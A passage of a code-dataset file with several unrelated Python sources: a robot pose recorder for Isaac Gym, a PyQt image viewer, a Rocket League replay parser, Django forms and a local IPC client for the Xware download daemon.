self.rigid_body_states[:, self.link_handles[-1]][:, 3:7]\n\n self.num_dofs = self.gym.get_sim_dof_count(self.sim) // self.num_envs\n self.robot_dof_pos_targets = torch.zeros(\n (self.num_envs, self.num_dofs), dtype=torch.float\n )\n\n def update_ee(self):\n # define the target and ensure it is within the kinematic constraints\n for i in range(self.num_dofs):\n self.robot_dof_pos_targets[:, i] = torch_rand_float(\n self.robot_dof_lower_limits[i],\n self.robot_dof_upper_limits[i],\n (self.num_envs, 1),\n device=self.device,\n ).squeeze()\n # print(robot_dof_pos_targets)\n # move the robot to the position\n self.gym.set_dof_position_target_tensor(\n self.sim, gymtorch.unwrap_tensor(self.robot_dof_pos_targets)\n )\n\n # try if this method moves the joints instantaneously\n # might need some velocity also according to file:///home/vrt/Downloads/RL_joint_generation/docs/api/python/gym_py.html?highlight=indexed#isaacgym.gymapi.Gym.set_dof_state_tensor\n # self.gym.set_dof_state_tensor(self.sim, gymtorch.unwrap_tensor(self.robot_dof_pos_targets))\n\n def get_ee_pose(self, loop_iter):\n # refresh the tensor data to acquire the pose of the end-effector\n self.gym.refresh_rigid_body_state_tensor(self.sim)\n self.end_effector_pose = self.rigid_body_states[:, self.link_handles[-1]][:, 0:7]\n # append this to the matrix that is to be written to 
the csv\n # print(self.end_effector_pose)\n\n self.storage = torch.cat([self.storage, self.end_effector_pose], dim=0)\n print(\n f\"Recording number {loop_iter} out of {self.args.num_samples} - Current length of vector: {len(self.storage)}\"\n )\n # print(f'Time: {timeit.default_timer() - self.start:.2f} seconds')\n # self.start = timeit.default_timer()\n\n def record(self):\n next_update_time = 1\n frame = 0\n\n for i in range(self.args.num_samples):\n # self.start = timeit.default_timer()\n self.storage = torch.zeros((1, 7), dtype=torch.float)\n\n # while not self.gym.query_viewer_has_closed(self.viewer):\n while len(self.storage) < 1000000:\n # check if we should update\n t = self.gym.get_sim_time(self.sim)\n\n if t >= next_update_time:\n self.update_ee()\n next_update_time += 4\n\n if t > 5:\n self.get_ee_pose(i)\n\n # step the physics\n self.gym.simulate(self.sim)\n self.gym.fetch_results(self.sim, True)\n\n # step rendering\n if not self.args.headless:\n self.gym.step_graphics(self.sim)\n self.gym.draw_viewer(self.viewer, self.sim, False)\n self.gym.sync_frame_time(self.sim)\n\n frame += 1\n\n data_cp = self.storage.cpu()\n data_np = data_cp.numpy()\n data_pd = pd.DataFrame(data_np[1:])\n data_pd.to_csv(\n f\"../curriculum_data/{self.task_name}_raw_data/data_{i}.csv\",\n index=False,\n header=False,\n )\n\n print(\"Done\")\n\n if not self.args.headless:\n self.gym.destroy_viewer(self.viewer)\n self.gym.destroy_sim(self.sim)\n\n def split(self):\n # implement something to collect all data_i.csv files into one\n path = f\"../curriculum_data/{self.task_name}_raw_data/\"\n all_files = glob.glob(os.path.join(path, \"*.csv\"))\n\n print(f'Path of all .csv files to be loaded:')\n print('\\n'.join(map(str, sorted(all_files, key = lambda x: int(x.split(\"/\")[-1].split(\"_\")[1].split(\".\")[0])))))\n\n df = pd.concat(\n (pd.read_csv(f, header=None, index_col=False) for f in all_files)\n )\n print(f\"Dataframe shape after loading all .csv files: {df.shape}\")\n\n df = df.to_numpy()\n\n # remove points that are on the boundary of the workspace\n raw_size = df.shape[0]\n point_tree = spatial.cKDTree(df[:, [0, 1, 2]])\n df_indices = point_tree.query_ball_point([0, 0, 0], self.workspace_size)\n df = pd.DataFrame(df[df_indices])\n print(f\"Number of out-of-range point discarded: {raw_size - df.shape[0]}\")\n\n # remove points that are too close to the ground\n raw_size = df.shape[0]\n df = df[df[2] >= 0.2]\n print(f'Number of point too close to the ground discarded: {raw_size - df.shape[0]}')\n\n df = df.to_numpy()\n\n # use nearest neighbourhood algorithm to separate curriculums\n point = [np.max(df[:, 0]) / 2, 0, np.max(df[:, 2]) / 2]\n for i, value in enumerate(self.curriculum_sizes):\n # create point tree of the first three columns of the dataframe\n point_tree = spatial.cKDTree(df[:, [0, 1, 2]])\n # obtains indices of the points within the neighborhood\n df_indices = point_tree.query_ball_point(point, value)\n # create a curriculum dataframe that contains only the points inside the specified radius\n curr = pd.DataFrame(df[df_indices])\n\n print(f\"Curriculum: {i} with {curr.shape} points\")\n curr.to_csv(\n f\"../curriculum_data/{self.task_name}_curriculums/curr_{i}.csv\",\n index=False,\n header=False,\n )\n\n\nif __name__ == \"__main__\":\n # configures the print options for numpy objects in the terminal\n set_np_formatting()\n # gets the command line arguments and parses them\n args = get_args()\n # manual overwrite because it only runs on the CPU and not GPU\n args.device = \"CPU\"\n # 
device used for pytorch to store tensors\n    sim_device = \"cpu\"\n    # grabs information from the two yaml files defining properties such as num_envs, physics engine, neural network properties\n    cfg, cfg_train, logdir = load_cfg(args)\n    # used for initializing the simulation parameters\n    sim_params = parse_sim_params(args, cfg, cfg_train)\n    # seed for random.seed, np.random.seed, and torch.manual_seed\n    set_seed(cfg_train[\"seed\"])\n\n    gen = GeneratePoses(\n        args=args,\n        cfg=cfg,\n        sim_params=sim_params,\n        physics_engine=args.physics_engine,\n        device_type=args.device,\n        device_id=args.device_id,\n        headless=args.headless,\n    )\n\n    if gen.args.record:\n        if not os.path.exists(f\"../curriculum_data/{gen.task_name}_raw_data/\"):\n            os.makedirs(f\"../curriculum_data/{gen.task_name}_raw_data/\")\n        gen.record()\n    if gen.args.split:\n        if not os.path.exists(f\"../curriculum_data/{gen.task_name}_curriculums/\"):\n            os.makedirs(f\"../curriculum_data/{gen.task_name}_curriculums/\")\n        gen.split()\n","sub_path":"python/rlgpu/tasks/generate_poses.py","file_name":"generate_poses.py","file_ext":"py","file_size_in_byte":14347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"347857316","text":"import sys\nimport cv2\n\nfrom PyQt5.QtCore import QPoint\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QWidget\nfrom PyQt5.QtGui import QPainter, QImage\nfrom PyQt5.uic import loadUiType\n\nimport imutils\n\n\nGIAO_DIEN, _ = loadUiType('giao_dien_xem_anh.ui')\n\n\n# Image widget\nclass ImageWidget(QWidget):\n    def __init__(self, parent=None):\n        super(ImageWidget, self).__init__(parent)\n        self.image = None\n\n    def setImage(self, image):\n        self.image = image\n        self.setMinimumSize(image.size())\n        self.update()\n\n    def paintEvent(self, event):\n        qp = QPainter()\n        qp.begin(self)\n        if self.image:\n            qp.drawImage(QPoint(0, 0), self.image)\n        qp.end()\n\n\nclass ChuongTrinhChinh(QMainWindow, GIAO_DIEN):\n    '''\n    Main program window\n    '''\n\n    def __init__(self, parent=None):\n        super(ChuongTrinhChinh, self).__init__(parent)\n        QMainWindow.__init__(self)\n        self.setupUi(self)\n        self.khoi_tao_su_kien()\n        self.khung_hinh_anh = ImageWidget(self)\n        self.khung_hien_thi_anh.addWidget(self.khung_hinh_anh)\n\n    def khoi_tao_su_kien(self):\n        '''\n        Initialize the event handlers\n        '''\n        self.gia_tri_nho_nhat.valueChanged.connect(self.hien_gia_tri_nho_nhat)\n        self.gia_tri_lon_nhat.valueChanged.connect(self.hien_gia_tri_lon_nhat)\n\n    def hien_gia_tri_nho_nhat(self, gia_tri):\n        '''\n        Show the minimum value\n        '''\n        self.hien_thi_nho_nhat.setText(str(gia_tri))\n\n    def hien_gia_tri_lon_nhat(self, gia_tri):\n        '''\n        Show the maximum value\n        '''\n        self.hien_thi_lon_nhat.setText(str(gia_tri))\n\n    def hien_thi_anh(self, hinh_anh, dinh_dang):\n        '''\n        Display the image\n        '''\n        if dinh_dang == 1:\n            dinh_dang_anh = QImage.Format_Grayscale8\n            du_lieu = hinh_anh.shape[1]\n        else:\n            dinh_dang_anh = QImage.Format_RGB888\n            du_lieu = hinh_anh.shape[1] * 3\n\n        q_hinh_anh = QImage(\n            hinh_anh.data,\n            hinh_anh.shape[1],\n            hinh_anh.shape[0],\n            du_lieu,\n            dinh_dang_anh,\n        )\n        self.khung_hinh_anh.setImage(q_hinh_anh)\n\n    def doc_anh(self, duong_dan):\n        '''\n        Read the specified image\n        '''\n        hinh_anh = cv2.imread(duong_dan)\n\n        # Adjust the display scale\n        ti_le = hinh_anh.shape[0] / 1000.0\n        anh_goc = hinh_anh.copy()\n        hinh_anh = imutils.resize(hinh_anh, height=1000)\n\n        # Convert to grayscale, blur, and find the edges\n        den_trang = cv2.cvtColor(hinh_anh, cv2.COLOR_BGR2GRAY)\n        den_trang = cv2.GaussianBlur(den_trang, (5, 5), 
0)\n cac_canh = cv2.Canny(den_trang, 55, 200)\n self.hien_thi_anh(den_trang, 1)\n\n\nif __name__ == '__main__':\n chuong_trinh = QApplication([])\n cua_so = ChuongTrinhChinh()\n cua_so.show()\n cua_so.doc_anh(sys.argv[1])\n chuong_trinh.exec_()\n","sub_path":"phieu_trac_nghiem/test_xem_anh.py","file_name":"test_xem_anh.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104938915","text":"import json\nimport pickle\nimport traceback\nfrom pprint import pprint\n\nfrom boto.exception import S3ResponseError\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom pyrope import Replay\nfrom pyrope.exceptions import FrameParsingError\n\n\nclass Parser(object):\n\n def __init__(self, file_path, parse_netstream=False, obj=None):\n self.replay = Replay(file_path)\n self.replay_id = self.replay.header['Id']\n\n self.actor_metadata = {}\n self.goal_metadata = {}\n self.match_metadata = {}\n self.team_metadata = {}\n self.actors = {}\n self.cars = {}\n self.boost_data = {}\n self.heatmap_json_filename = None\n\n assert len(self.team_metadata) == 0\n\n pickle_filename = 'uploads/pickle_files/{}.pickle'.format(self.replay_id)\n heatmap_json_filename = 'uploads/replay_json_files/{}.json'.format(self.replay_id)\n location_json_filename = 'uploads/replay_location_json_files/{}.json'.format(self.replay_id)\n\n if parse_netstream:\n try:\n self.replay = pickle.loads(default_storage.open(pickle_filename).read())\n except (FileNotFoundError, OSError, S3ResponseError):\n try:\n self.replay.parse_netstream()\n default_storage.save(pickle_filename, ContentFile(pickle.dumps(self.replay)))\n except FrameParsingError:\n # Bail us out of here early, just provide an 'old school' parse.\n parse_netstream = False\n traceback.print_exc()\n\n if not parse_netstream:\n return\n\n self._get_actors()\n\n # If the number of goals in the header doesn't match the number of goals\n # in the game, try to get the missing goal data from the netstream.\n\n \"\"\"\n ('3e_Team1',\n {'actor_id': 3,\n 'actor_type': 'Archetypes.Teams.Team1',\n 'data': {'Engine.TeamInfo:Score': 1},\n 'new': False,\n 'startpos': 2053839}),\n \"\"\"\n if len(self.replay.header.get('Goals', [])) < self.replay.header.get('Team0Score', 0) + self.replay.header.get('Team1Score', 0):\n for index, frame in self.replay.netstream.items():\n for _, actor in frame.actors.items():\n if 'data' not in actor:\n continue\n\n if (\n 'Engine.TeamInfo:Score' in actor['data'] and\n 'TAGame.Team_TA:GameEvent' not in actor['data'] and\n actor['actor_type'].startswith('Archetypes.Teams.Team')\n ):\n if 'Goals' not in self.replay.header:\n self.replay.header['Goals'] = []\n\n self.replay.header['Goals'].append({\n 'PlayerName': 'Unknown player (own goal?)',\n 'PlayerTeam': actor['actor_type'].replace('Archetypes.Teams.Team', ''),\n 'frame': index\n })\n\n # Extract the goal information.\n if 'Goals' in self.replay.header:\n for goal in self.replay.header['Goals']:\n self._extract_goal_data(goal['frame'])\n\n if 'NumFrames' in self.replay.header:\n assert len(self.team_metadata) == 2\n\n for player in self.actors.copy():\n # Get their position data.\n if 'type' not in self.actors[player]:\n continue\n\n if self.actors[player]['type'] == 'player':\n self.actors[player]['position_data'] = self._get_player_position_data(player)\n elif self.actors[player]['type'] == 'ball':\n if 'ball' not in self.actors:\n self.actors['ball'] = {\n 
'position_data': {}\n }\n\n ball_data = self._get_player_position_data(player)\n\n self.actors['ball']['position_data'] = {\n **self.actors['ball']['position_data'],\n **ball_data\n }\n\n del self.actors[player]\n\n # Compress the location data per (player) actor.\n compressed_data = {}\n\n for actor in self.actors:\n if 'type' not in self.actors[actor]:\n continue\n\n if self.actors[actor]['type'] == 'player':\n compressed_data[actor] = {}\n\n current_key = ''\n key = ''\n\n keys = self.actors[actor]['position_data'].keys()\n\n if len(keys) == 0:\n continue\n\n for frame in range(min(keys), max(keys)):\n if frame in self.actors[actor]['position_data']:\n data = self.actors[actor]['position_data'][frame]\n key = '{},{}'.format(data['x'], data['y'])\n\n if key == current_key:\n compressed_data[actor][key] += 1\n else:\n if key not in compressed_data[actor]:\n compressed_data[actor][key] = 1\n else:\n compressed_data[actor][key] += 1\n\n assert sum([i[1] for i in compressed_data[actor].items()]) == max(self.actors[actor]['position_data'], key=int) - min(self.actors[actor]['position_data'], key=int)\n\n if default_storage.exists(heatmap_json_filename):\n default_storage.delete(heatmap_json_filename)\n\n heatmap_json_filename = default_storage.save(heatmap_json_filename, ContentFile(json.dumps(compressed_data, separators=(',', ':'))))\n\n self.heatmap_json_filename = heatmap_json_filename\n\n if obj.eligble_for_feature('playback'):\n # Advanced replay parsing.\n # Restructure the data so that it's chunkable.\n frame_data = []\n\n for frame in range(self.replay.header['NumFrames']):\n frame_dict = {\n 'time': self.replay.netstream[frame].current,\n 'actors': []\n }\n\n for player in self.actors:\n position_data = self.actors[player]['position_data']\n\n if frame in position_data:\n frame_dict['actors'].append({\n 'id': player,\n 'type': self.actors[player].get('type', 'ball'),\n **position_data[frame]\n })\n\n frame_data.append(frame_dict)\n\n if default_storage.exists(location_json_filename):\n default_storage.delete(location_json_filename)\n\n self._get_boost_data()\n self._get_seconds_remaining()\n # pprint(self.boost_data)\n\n small_actors = {}\n\n for key, value in self.actors.items():\n small_actors[key] = value\n\n del small_actors[key]['position_data']\n\n final_data = {\n 'frame_data': frame_data,\n 'goals': self.replay.header.get('Goals', []),\n 'boost': self.boost_data,\n 'seconds_mapping': self.seconds_mapping,\n 'actors': self.actors,\n 'teams': self.team_metadata\n }\n\n location_json_filename = default_storage.save(location_json_filename, ContentFile(json.dumps(final_data, separators=(',', ':'))))\n self.location_json_filename = location_json_filename\n\n def _get_match_metadata(self, frame):\n # Search through the frames looking for some game replication info.\n game_info = [\n value for name, value in frame.actors.items()\n if (\n 'GameReplicationInfoArchetype' in name and\n 'Engine.GameReplicationInfo:ServerName' in value['data']\n )\n ]\n\n if not game_info:\n return\n\n game_info = game_info[0]['data']\n\n self.match_metadata = {\n 'server_name': game_info['Engine.GameReplicationInfo:ServerName'],\n 'playlist': game_info.get('ProjectX.GRI_X:ReplicatedGamePlaylist', 0)\n }\n\n def _get_team_metadata(self, frame):\n # Search through the frame looking for team info.\n team_info = [\n value for name, value in frame.actors.items()\n if 'Archetypes.Teams.Team' in value.get('actor_type', '') and value['new']\n ]\n\n if not team_info:\n return\n\n for team in team_info:\n 
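# map this team actor's id to its team number, parsed from the tail of 'Archetypes.Teams.TeamN'\n            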
self.team_metadata[team['actor_id']] = team['actor_type'].replace('Archetypes.Teams.Team', '')\n\n def _extract_goal_data(self, base_index, search_index=None):\n # If the player name is unique within the actor set, then don't bother\n # searching through frames for the data.\n for goal in self.replay.header['Goals']:\n if goal['frame'] == base_index:\n player = [\n actor_id\n for actor_id, data in self.actors.items()\n if data['type'] == 'player' and data['name'] == goal['PlayerName']\n ]\n\n if len(player) == 1:\n self.goal_metadata[base_index] = player[0]\n return\n\n # We found the goal we wanted, we just couldn't find the player,\n # but break out early as a minor optimisation.\n break\n\n if not search_index:\n search_index = base_index\n\n if base_index not in self.replay.netstream:\n search_index = base_index - 1\n\n frame = self.replay.netstream[search_index]\n\n scorer = None\n\n players = [\n value\n for name, value in frame.actors.items()\n if value['actor_type'] == 'TAGame.Default__PRI_TA'\n ]\n\n # Figure out who scored.\n for value in players:\n if 'TAGame.PRI_TA:MatchGoals' in value['data']:\n scorer = value['actor_id']\n break\n\n if 'TAGame.PRI_TA:MatchAssists' in value['data']:\n # print('we have the assister!', value['actor_id'])\n pass\n\n # Search in the closest frames, then gradually expand the search.\n\n if scorer is None:\n if search_index < base_index - 100:\n print('Unable to find goal for frame', base_index)\n return\n\n if search_index == base_index:\n next_index = base_index - 1\n elif search_index - base_index < 0:\n next_index = base_index + abs(search_index - base_index)\n elif search_index - base_index > 0:\n next_index = base_index + (search_index - base_index + 1) * -1\n\n if next_index not in self.replay.netstream:\n next_index = search_index - 1\n\n self._extract_goal_data(base_index, next_index)\n return\n\n # print('Found goal', search_index - base_index)\n self.goal_metadata[base_index] = scorer\n\n def _get_actors(self):\n for index, frame in self.replay.netstream.items():\n # We can attempt to get the match metadata during this loop and\n # save us having to loop the netstream more than once.\n if not self.match_metadata:\n self._get_match_metadata(frame)\n\n if len(self.team_metadata) < 2:\n self._get_team_metadata(frame)\n\n # Find the player actor objects.\n players = [\n value\n for name, value in frame.actors.items()\n if value['actor_type'] == 'TAGame.Default__PRI_TA'\n ]\n\n for value in players:\n \"\"\"\n Example `value`:\n\n {'actor_id': 2,\n 'actor_type': 'TAGame.Default__PRI_TA',\n 'data': {'Engine.PlayerReplicationInfo:Ping': 24,\n 'Engine.PlayerReplicationInfo:PlayerID': 656,\n 'Engine.PlayerReplicationInfo:PlayerName': \"AvD Sub'n\",\n 'Engine.PlayerReplicationInfo:Team': (True, 6),\n 'Engine.PlayerReplicationInfo:UniqueId': (1, 76561198040631598, 0),\n 'Engine.PlayerReplicationInfo:bReadyToPlay': True,\n 'TAGame.PRI_TA:CameraSettings': {'dist': 270.0,\n 'fov': 107.0,\n 'height': 110.0,\n 'pitch': -2.0,\n 'stiff': 1.0,\n 'swiv': 4.300000190734863},\n 'TAGame.PRI_TA:ClientLoadout': (11, [23, 0, 613, 39, 752, 0, 0]),\n 'TAGame.PRI_TA:ClientLoadoutOnline': (11, 0, 0),\n 'TAGame.PRI_TA:PartyLeader': (1, 76561198071203042, 0),\n 'TAGame.PRI_TA:ReplicatedGameEvent': (True, 1),\n 'TAGame.PRI_TA:Title': 0,\n 'TAGame.PRI_TA:TotalXP': 9341290,\n 'TAGame.PRI_TA:bUsingSecondaryCamera': True},\n 'new': False,\n 'startpos': 102988}\n \"\"\"\n\n if 'data' not in value:\n continue\n\n if 'Engine.PlayerReplicationInfo:bWaitingPlayer' in 
value['data']:\n continue\n\n team_id = None\n actor_id = value['actor_id']\n\n if 'Engine.PlayerReplicationInfo:Team' in value['data']:\n team_id = value['data']['Engine.PlayerReplicationInfo:Team'][1]\n\n if actor_id in self.actors:\n if team_id is not None:\n if self.actors[actor_id]['team'] != team_id:\n if actor_id in self.actor_metadata:\n self.actor_metadata[actor_id]['Engine.PlayerReplicationInfo:Team'] = value['data']['Engine.PlayerReplicationInfo:Team']\n\n if team_id != -1:\n self.actors[actor_id]['team'] = team_id\n\n if not self.actors[actor_id]['team'] or team_id == -1:\n # self.actors[actor_id]['team'] = team_id\n self.actors[actor_id]['left'] = index\n\n elif 'TAGame.PRI_TA:ClientLoadout' in value['data']:\n player_name = value['data']['Engine.PlayerReplicationInfo:PlayerName']\n\n self.actors[actor_id] = {\n 'type': 'player',\n 'join': index,\n 'left': self.replay.header['NumFrames'],\n 'name': player_name,\n 'team': team_id,\n }\n\n if actor_id not in self.actor_metadata:\n self.actor_metadata[actor_id] = value['data']\n\n # See if our current data value has any new fields.\n if actor_id not in self.actor_metadata:\n self.actor_metadata[actor_id] = value['data']\n else:\n for key, value in value['data'].items():\n if key not in self.actor_metadata[actor_id]:\n self.actor_metadata[actor_id][key] = value\n\n # Get the ball data (if any).\n ball = [\n value\n for name, value in frame.actors.items()\n if (\n value['actor_type'] == 'Archetypes.Ball.Ball_Default' and\n 'TAGame.RBActor_TA:ReplicatedRBState' in value.get('data', {})\n )\n ]\n\n if ball:\n # pprint(ball)\n ball = ball[0]\n\n if ball['actor_id'] not in self.actors and 'TAGame.RBActor_TA:ReplicatedRBState' in ball['data']:\n self.actors[ball['actor_id']] = {\n 'type': 'ball'\n }\n\n def _get_boost_data(self):\n # 'TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount'\n\n # Do we have a new car object? 
Assign it to the user.\n \"\"\"\n {'actor_id': 7,\n 'actor_type': 'Archetypes.Car.Car_Default',\n 'data': {'Engine.Pawn:PlayerReplicationInfo': (True, 4),\n 'TAGame.Car_TA:TeamPaint': {'CustomColorID': 90,\n 'CustomFinishID': 270,\n 'Team': 0,\n 'TeamColorID': 3,\n 'TeamFinishID': 270},\n 'TAGame.RBActor_TA:ReplicatedRBState': {'flag': False,\n 'pos': (0, -4608, 43),\n 'rot': (-1.000030518509476,\n -0.500015259254738,\n -1.000030518509476),\n 'vec1': (0, 0, -162),\n 'vec2': (0, 0, 0)},\n 'TAGame.Vehicle_TA:ReplicatedThrottle': 255},\n 'new': False,\n 'startpos': 4230}\n {'actor_id': 8,\n 'actor_type': 'Archetypes.CarComponents.CarComponent_Boost',\n 'data': {'TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount': 85,\n 'TAGame.CarComponent_TA:Vehicle': (True, 7)},\n 'new': False,\n 'startpos': 4537}\n \"\"\"\n\n self.boost_actors = {}\n self.cars = {}\n\n for index, frame in self.replay.netstream.items():\n # pprint(frame.actors.items())\n\n for name, value in frame.actors.items():\n actor_id = value['actor_id']\n\n # Get any cars.\n if value['actor_type'] == 'Archetypes.Car.Car_Default':\n if 'data' not in value:\n continue\n\n if 'Engine.Pawn:PlayerReplicationInfo' in value['data']:\n player_id = value['data']['Engine.Pawn:PlayerReplicationInfo'][1]\n self.cars[actor_id] = player_id\n\n # Get any boost objects.\n if value['actor_type'] == 'Archetypes.CarComponents.CarComponent_Boost':\n if actor_id not in self.boost_actors:\n self.boost_actors[actor_id] = {}\n\n if 'data' not in value:\n continue\n\n if 'TAGame.CarComponent_TA:Vehicle' in value['data']:\n car_id = value['data']['TAGame.CarComponent_TA:Vehicle'][1]\n self.boost_actors[actor_id] = car_id\n\n if 'TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount' in value['data']:\n if actor_id not in self.boost_data:\n self.boost_data[actor_id] = {}\n\n self.boost_data[actor_id][index] = value['data']['TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount']\n\n # Data structure:\n #\n # value key = booster id (in values)\n # booster id maps to a car (in actors)\n # cars map to players (in card)\n\n self.boost_data = {\n 'values': self.boost_data,\n 'actors': self.boost_actors,\n 'cars': self.cars,\n }\n\n def _get_seconds_remaining(self):\n self.seconds_mapping = {}\n\n for index, frame in self.replay.netstream.items():\n for name, value in frame.actors.items():\n if 'data' not in value:\n continue\n\n if 'TAGame.GameEvent_Soccar_TA:SecondsRemaining' in value['data']:\n self.seconds_mapping[index] = value['data']['TAGame.GameEvent_Soccar_TA:SecondsRemaining']\n\n def _get_player_position_data(self, player_id):\n player = self.actors[player_id]\n result = {}\n\n car_actor_obj = None\n\n # TODO: Refactor this to only loop the netstream once.\n if player['type'] == 'player':\n for index in range(player['join'], player['left']):\n try:\n frame = self.replay.netstream[index]\n except KeyError:\n # Handle truncated network data.\n break\n\n # First we need to find the player's car object.\n for actor in frame.actors:\n actor_obj = frame.actors[actor]\n\n if 'data' not in actor_obj:\n continue\n\n engine = actor_obj['data'].get('Engine.Pawn:PlayerReplicationInfo')\n\n # This is the correct object for this player.\n if engine and engine[1] == player_id:\n car_actor_obj = actor_obj['actor_id']\n\n # If the actor we're looking at is the car object, then get the\n # position and rotation data for this frame.\n if actor_obj['actor_id'] == car_actor_obj:\n state_data = actor_obj['data'].get('TAGame.RBActor_TA:ReplicatedRBState')\n\n if state_data:\n x, y, 
z = state_data['pos']\n yaw, pitch, roll = state_data['rot']\n\n result[index] = {\n 'x': x,\n 'y': y,\n 'z': z,\n 'pitch': pitch,\n 'roll': roll,\n 'yaw': yaw\n }\n\n elif player['type'] == 'ball':\n for index, frame in self.replay.netstream.items():\n # Does this actor exist in the frame data?\n for actor in frame.actors:\n actor_obj = frame.actors[actor]\n\n if 'data' not in actor_obj:\n continue\n\n if actor_obj['actor_id'] != player_id:\n continue\n\n if 'TAGame.RBActor_TA:ReplicatedRBState' not in actor_obj['data']:\n continue\n\n if actor_obj['actor_type'] != 'Archetypes.Ball.Ball_Default':\n continue\n\n state_data = actor_obj['data']['TAGame.RBActor_TA:ReplicatedRBState']\n\n x, y, z = state_data['pos']\n yaw, pitch, roll = state_data['rot']\n\n result[index] = {\n 'x': x,\n 'y': y,\n 'z': z,\n 'pitch': pitch,\n 'roll': roll,\n 'yaw': yaw\n }\n\n return result\n","sub_path":"rocket_league/apps/replays/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":23235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"109108607","text":"from django import forms\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.contrib.auth.models import User\n\nfrom .models import Article, Message, Social\n\n\nclass BaseForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass UserUpdateForm(BaseForm):\n\n class Meta:\n model = User\n fields = ['first_name', 'last_name', 'username', 'email', ]\n\n\nclass SignUpForm(UserCreationForm):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n \n class Meta:\n model = User\n fields = ['first_name', 'last_name', 'username', 'email', 'password1', 'password2', ]\n\n \nclass UserLoginForm(AuthenticationForm):\n \n def __init__(self, request, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field_name, field in self.fields.items():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass ArticleForm(BaseForm):\n\n class Meta:\n model = Article\n fields = ['title', 'details', 'footer', 'link', ]\n\n\nclass MessageForm(BaseForm):\n\n class Meta:\n model = Message\n fields = ['full_name', 'email', 'message', ]\n\n\nclass SocialForm(BaseForm):\n\n class Meta:\n model = Social\n fields = ['website', 'url', 'icon', ]\n","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532676580","text":"# -*- coding: utf-8 -*-\n\nimport logging\nfrom launcher import app\n\nfrom PyQt5.QtCore import QObject, pyqtSignal, pyqtSlot, pyqtProperty\n\nimport threading, time\nimport os\nfrom utils.misc import tryRemove, trySymlink, tryMkdir\nfrom utils.system import getInitType, InitType\nimport constants\n\nfrom multiprocessing.connection import Client\n\n\nclass _XwaredCommunicationClient(object):\n funcName = None\n args = tuple()\n kwargs = dict()\n sent = False\n conn = None\n response = None\n received = False\n\n def __init__(self):\n self.conn = Client(*constants.XWARED_SOCKET)\n\n def send(self):\n if not self.funcName:\n raise ValueError(\"no funcName\")\n self.conn.send([self.funcName, self.args, self.kwargs])\n self.sent = True\n self.response = 
self.conn.recv()\n self.received = True\n self.conn.close()\n\n def setFunc(self, funcName):\n if self.sent:\n raise Exception(\"sent already.\")\n self.funcName = funcName\n\n def setArgs(self, args):\n if self.sent:\n raise Exception(\"sent already.\")\n self.args = args\n\n def setKwargs(self, kwargs):\n if self.sent:\n raise Exception(\"sent already.\")\n self.kwargs = kwargs\n\n def getReturnValue(self):\n if not self.sent:\n raise Exception(\"not sent yet.\")\n if not self.received:\n raise Exception(\"not received yet.\")\n return self.response\n\n\nclass InvalidSocket(FileNotFoundError, ConnectionRefusedError):\n pass\n\n\ndef callXwaredInterface(funcName, *args, **kwargs):\n try:\n client = _XwaredCommunicationClient()\n except (FileNotFoundError, ConnectionRefusedError) as e:\n logging.error(\"XwaredInterface InvalidSocket with method {}\".format(funcName))\n raise InvalidSocket(e)\n\n client.setFunc(funcName)\n if args:\n client.setArgs(args)\n if kwargs:\n client.setKwargs(kwargs)\n client.send()\n result = client.getReturnValue()\n logging.info(\"{funcName} -> {result}\".format(**locals()))\n del client\n return result\n\n\n# an interface to watch, notify, and supervise the status of xwared and ETM\nclass XwaredPy(QObject):\n statusUpdated = pyqtSignal()\n\n _etmStatus = None\n _xwaredStatus = None\n _userId = None\n _peerId = None\n _lcPort = None\n\n _t = None\n\n def __init__(self, parent):\n super().__init__(parent)\n\n app.aboutToQuit.connect(self.stopXware)\n self.startXware()\n self._t = threading.Thread(target = self._watcherThread, daemon = True,\n name = \"xwared/etm watch thread\")\n self._t.start()\n app.sigMainWinLoaded.connect(self.connectUI)\n\n @pyqtProperty(bool, notify = statusUpdated)\n def etmStatus(self):\n return self._etmStatus\n\n @pyqtProperty(bool, notify = statusUpdated)\n def xwaredStatus(self):\n return self._xwaredStatus\n\n @pyqtProperty(str, notify = statusUpdated)\n def userId(self):\n return self._userId\n\n @pyqtProperty(str, notify = statusUpdated)\n def peerId(self):\n return self._peerId\n\n @pyqtProperty(int, notify = statusUpdated)\n def lcPort(self):\n return self._lcPort\n\n def _statusUpdate(self, etmStatus, xwaredStatus, userId, peerId, lcPort):\n self._etmStatus = etmStatus\n self._xwaredStatus = xwaredStatus\n self._userId = userId\n self._peerId = peerId\n self._lcPort = lcPort\n self.statusUpdated.emit()\n\n @pyqtSlot()\n def connectUI(self):\n # Note: The menu actions enable/disable toggling are handled by statusbar.\n app.mainWin.action_ETMstart.triggered.connect(self.slotStartETM)\n app.mainWin.action_ETMstop.triggered.connect(self.slotStopETM)\n app.mainWin.action_ETMrestart.triggered.connect(self.slotRestartETM)\n\n @staticmethod\n def startXware():\n try:\n callXwaredInterface(\"start\")\n except InvalidSocket:\n pass\n\n @staticmethod\n def stopXware():\n try:\n callXwaredInterface(\"quit\")\n except InvalidSocket:\n pass\n\n @property\n def startEtmWhen(self):\n # return None if cannot get the value\n try:\n return callXwaredInterface(\"getStartEtmWhen\")\n except InvalidSocket:\n return None\n\n @startEtmWhen.setter\n def 